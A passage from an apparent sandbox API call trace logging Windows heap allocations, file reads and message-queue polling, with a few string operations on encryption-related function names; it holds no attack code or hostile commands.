Flags=0x0, Size=0x18) returned 0x1796d68 [0125.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0125.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0125.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0125.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0125.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0125.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0125.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x1b86020 [0125.874] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ef00 | out: lpNewFilePointer=0x0) returned 1 [0125.874] ReadFile (in: hFile=0x2a0, lpBuffer=0x43eb450, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb450*, lpNumberOfBytesRead=0x144ef28*=0xff62, lpOverlapped=0x0) returned 1 [0125.877] ReadFile (in: hFile=0x2a0, lpBuffer=0x43eb450, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb450*, lpNumberOfBytesRead=0x144ef28*=0x0, lpOverlapped=0x0) returned 1 [0125.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0125.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0125.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0125.877] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0125.877] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xff62) returned 0x49aa010 [0125.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1b86020 | out: hHeap=0x1780000) returned 1 [0125.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0125.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0125.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0125.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0125.882] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0125.882] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xff62) returned 0x49b9f80 [0125.884] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x49aa010 | out: hHeap=0x1780000) returned 1 [0125.885] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0125.885] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0125.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0125.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0125.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0125.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0125.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0125.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xff62) returned 0x49aa010 [0125.885] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0125.885] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x49aa010 | out: hHeap=0x1780000) returned 1 [0125.885] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0125.885] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0125.885] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0125.885] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0125.885] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0125.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0125.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0125.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e28 [0125.885] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0125.885] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0125.885] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0125.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0125.886] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0125.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0125.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0125.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392260 [0125.886] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0125.886] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392260 | out: hHeap=0x1780000) returned 1 [0125.886] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0125.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0125.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25b0 [0125.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0125.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0125.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0125.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0125.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xff62) returned 0x49aa010 [0125.886] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0125.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2660 [0125.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0125.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0125.886] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0125.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2680 [0125.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0125.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0125.887] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0125.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2590 [0125.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0125.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0125.887] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0125.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca718 [0125.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0125.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0125.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0125.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0125.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0125.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xff62) returned 0x49c9ef0 [0125.888] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0125.888] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0125.888] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0125.888] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0125.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0125.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0125.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0125.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0125.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0125.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0125.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0125.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0125.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0125.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0125.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0125.889] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0125.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0125.889] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0125.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0125.889] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0125.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0125.889] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0125.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0125.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0125.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0125.889] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0125.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0125.890] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0125.890] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0125.890] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0125.890] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0125.890] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0125.890] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c78 [0125.890] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0125.890] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c78 | out: hHeap=0x1780000) returned 1 [0125.890] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0125.890] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0125.890] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2720 [0125.890] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0125.890] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0125.890] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0125.890] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0125.890] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca940 [0125.890] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0125.890] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0125.890] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0125.890] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0125.890] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0125.890] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0125.890] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0125.891] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0125.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0125.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0125.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0125.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0125.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0125.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0125.891] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0125.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0125.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0125.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0125.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0125.891] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0125.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796f08 [0125.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0125.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0125.891] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0125.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2788 [0125.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0125.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0125.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0125.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0125.892] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0125.892] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0125.892] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0125.892] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0125.892] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0125.892] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0125.892] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0125.892] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0125.892] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0125.892] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0125.892] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0125.892] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0125.892] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0125.892] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0125.892] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0125.892] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0125.892] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe50 | out: hHeap=0x1780000) returned 1 [0125.892] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0125.892] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0125.892] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0125.892] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0125.892] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0125.892] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0125.892] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0125.893] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0125.893] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0125.893] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0125.893] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0125.893] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0125.893] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0125.893] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392298 [0125.893] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0125.893] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392298 | out: hHeap=0x1780000) returned 1 [0125.893] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0125.893] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8f8 [0125.893] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0125.893] PeekMessageW (in: lpMsg=0x144e244, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e244) returned 0 [0125.893] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0125.893] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0125.893] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0125.893] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0125.893] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0125.893] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0125.893] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0125.893] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0125.893] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0125.893] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0125.894] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0125.894] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0125.894] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0125.894] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0125.894] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0125.894] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0125.894] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0125.894] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0125.894] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0125.894] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0125.894] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0125.894] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0125.894] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0125.894] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0125.894] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0125.894] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0125.894] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0125.894] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0125.894] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0125.894] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0125.894] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0125.894] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0125.895] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0125.895] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0125.895] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0125.895] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0125.895] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0125.895] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ec8 [0125.895] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2728 [0125.895] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0125.895] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0125.895] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0125.895] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0125.895] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0125.895] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0125.895] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0125.895] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0125.895] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0125.895] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0125.895] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0125.895] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0125.895] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ee8 [0125.895] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0125.895] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0125.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0125.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, 